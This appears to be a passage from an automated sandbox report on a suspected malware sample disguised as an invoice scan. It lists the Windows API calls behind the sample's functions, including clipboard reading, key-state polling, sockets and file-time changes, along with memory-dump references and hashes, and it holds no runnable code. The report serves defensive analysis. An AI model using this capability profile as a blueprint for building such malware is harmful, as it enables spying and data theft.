                                                                              • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                              • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                              • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                              • String ID: HH
                                                                              • API String ID: 1915432386-2761332787
                                                                              • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                              • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                              • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                              • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DEFINE$`$h$h
                                                                              • API String ID: 0-4194577831
                                                                              • Opcode ID: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                              • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                                                              • Opcode Fuzzy Hash: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                              • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000001,00000006), ref: 004648B0
                                                                              • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 004648DA
                                                                              • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                              • closesocket.WSOCK32(00000000), ref: 0046492D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$bindclosesocketsocket
                                                                              • String ID:
                                                                              • API String ID: 2609815416-0
                                                                              • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                              • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                              • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                              • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                              • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                              • __wsplitpath.LIBCMT ref: 004370A5
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • _wcscat.LIBCMT ref: 004370BA
                                                                              • __wcsicoll.LIBCMT ref: 004370C8
                                                                              • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                              • String ID:
                                                                              • API String ID: 2547909840-0
                                                                              • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                              • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                              • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                              • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                              • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                              • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                              • String ID: *.*
                                                                              • API String ID: 2693929171-438819550
                                                                              • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                              • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                              • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                              • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                              APIs
                                                                              • OpenClipboard.USER32(?), ref: 0046C635
                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                              • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                              • CloseClipboard.USER32 ref: 0046C65D
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                              • CloseClipboard.USER32 ref: 0046C692
                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                              • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                              • CloseClipboard.USER32 ref: 0046C866
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                              • String ID: HH
                                                                              • API String ID: 589737431-2761332787
                                                                              • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                              • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                                                                              • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                              • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                                                                              APIs
                                                                              • __wcsicoll.LIBCMT ref: 0043643C
                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                              • __wcsicoll.LIBCMT ref: 00436466
                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicollmouse_event
                                                                              • String ID: DOWN
                                                                              • API String ID: 1033544147-711622031
                                                                              • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                              • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                              • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                              • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                              APIs
                                                                                • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00474213
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 4170576061-0
                                                                              • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                              • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                              • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                              • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                              APIs
                                                                              • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                              • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                              • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                              • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 3539004672-0
                                                                              • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                              • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                              • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                              • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                              APIs
                                                                                • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                              • IsWindowVisible.USER32 ref: 00477314
                                                                              • IsWindowEnabled.USER32 ref: 00477324
                                                                              • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                              • IsIconic.USER32 ref: 0047733F
                                                                              • IsZoomed.USER32 ref: 0047734D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                              • String ID:
                                                                              • API String ID: 292994002-0
                                                                              • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                              • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                              • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                              • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                              • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleTime
                                                                              • String ID:
                                                                              • API String ID: 3397143404-0
                                                                              • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                              • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                              • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                              • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _strncmp
                                                                              • String ID: ACCEPT$^$h
                                                                              • API String ID: 909875538-4263704089
                                                                              • Opcode ID: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                              • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                                                                              • Opcode Fuzzy Hash: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                              • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ERCP$VUUU$VUUU$VUUU
                                                                              • API String ID: 0-2165971703
                                                                              • Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                              • Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
                                                                              • Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                              • Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 3541575487-0
                                                                              • Opcode ID: ac224c61b0bec13984a9c65faca811663248c50f7443f2a65211f7a35ae4db88
                                                                              • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                              • Opcode Fuzzy Hash: ac224c61b0bec13984a9c65faca811663248c50f7443f2a65211f7a35ae4db88
                                                                              • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                              APIs
                                                                              • __time64.LIBCMT ref: 004433A2
                                                                                • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                              • String ID: rJ
                                                                              • API String ID: 2893107130-1865492326
                                                                              • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                              • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                              • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                              • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                              APIs
                                                                              • __time64.LIBCMT ref: 004433A2
                                                                                • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                              • String ID: rJ
                                                                              • API String ID: 2893107130-1865492326
                                                                              • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                              • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                              • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                              • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                              APIs
                                                                              • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
